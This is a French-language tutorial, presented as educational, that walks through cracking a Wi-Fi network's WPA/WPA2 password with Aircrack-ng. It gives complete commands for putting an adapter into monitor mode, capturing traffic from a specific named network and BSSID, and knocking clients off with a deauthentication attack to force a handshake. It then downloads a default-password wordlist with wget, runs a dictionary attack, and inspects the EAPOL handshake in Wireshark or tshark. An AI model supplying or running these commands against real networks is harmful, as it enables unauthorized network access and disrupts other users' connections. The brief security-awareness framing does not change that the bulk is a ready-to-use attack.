Ce guide explique comment utiliser Aircrack-ng pour pirater un réseau Wi-Fi à des fins éducatives.
L'objectif est de comprendre les vulnérabilités des réseaux sans fil pour les sécuriser.
Un ordinateur sous Linux (Ubuntu de préférence).
Aircrack-ng installé.
Si sur windows Un adaptateur Wi-Fi compatible avec le mode monitor ou installer linux directement.
Ouvrez un terminal et tapez :
sudo apt update
sudo apt install aircrack-ng
Listez vos interfaces réseau pour identifier votre interface Wi-Fi :
sudo iwconfig
Mettez votre interface Wi-Fi en mode monitor :
sudo airmon-ng start wlan0
Remplacez wlan0
par le nom de votre interface Wi-Fi.
Utilisez airodump-ng
pour capturer les paquets du réseau cible :
sudo airodump-ng wlan0mon
Remplacez wlan0mon
par votre interface en mode monitor.
Notez le canal du réseau cible (ELEGOO-681ED5A3C9C8) et son BSSID (C8:C9:A3:D5:1E:69).
Lancez la capture des paquets :
sudo airodump-ng -c [channel] --bssid C8:C9:A3:D5:1E:69 -w capture wlan0mon
Remplacez [channel]
par le canal du réseau cible.
Pour accélérer le processus, vous pouvez déconnecter les clients pour forcer la réauthentification :
sudo aireplay-ng --deauth 10 -a C8:C9:A3:D5:1E:69 wlan0mon
Téléchargez la liste de mots de passe par défaut :
wget https://raw.githubusercontent.com/ljamel/defaultpass/master/defaultpass1000.txt -O defaultpass1000.txt
Utilisez Aircrack-ng pour casser le mot de passe en utilisant le fichier de capture et la liste de mots de passe :
sudo aircrack-ng -w defaultpass1000.txt -b C8:C9:A3:D5:1E:69 capture-01.cap
Si le mot de passe est trouvé, il sera affiché dans le terminal.
En suivant ces étapes, vous pouvez démontrer la vulnérabilité d'un réseau Wi-Fi avec un mot de passe par défaut et apprendre comment renforcer la sécurité de votre propre réseau.
Vous pouvez également analyser le fichier de capture manuellement en utilisant Wireshark
, un outil graphique qui permet d'inspecter les paquets capturés. Voici comment procéder :
Ouvrez Wireshark : Si vous ne l'avez pas installé, vous pouvez l'installer en utilisant :
sudo apt install wireshark
Ouvrez le fichier de capture : Chargez le fichier psk-08.cap-01.cap
dans Wireshark.
Filtrer les paquets EAPOL : Utilisez le filtre suivant pour afficher uniquement les paquets EAPOL (Extensible Authentication Protocol over LAN) :
eapol
Vérifiez la présence des handshakes : Vous devriez voir au moins quatre paquets EAPOL. Les paquets typiques d'un handshake WPA/WPA2 sont :
1er paquet : EAPOL Key (Message 1)
2ème paquet : EAPOL Key (Message 2)
3ème paquet : EAPOL Key (Message 3)
4ème paquet : EAPOL Key (Message 4)
Vous pouvez aussi utiliser tshark
, la version en ligne de commande de Wireshark, pour vérifier la présence de handshakes :
tshark -r psk-08.cap-01.cap -Y eapol
Cette commande affichera tous les paquets EAPOL dans le fichier de capture. Vous pouvez compter les messages pour vérifier la présence d'un handshake complet.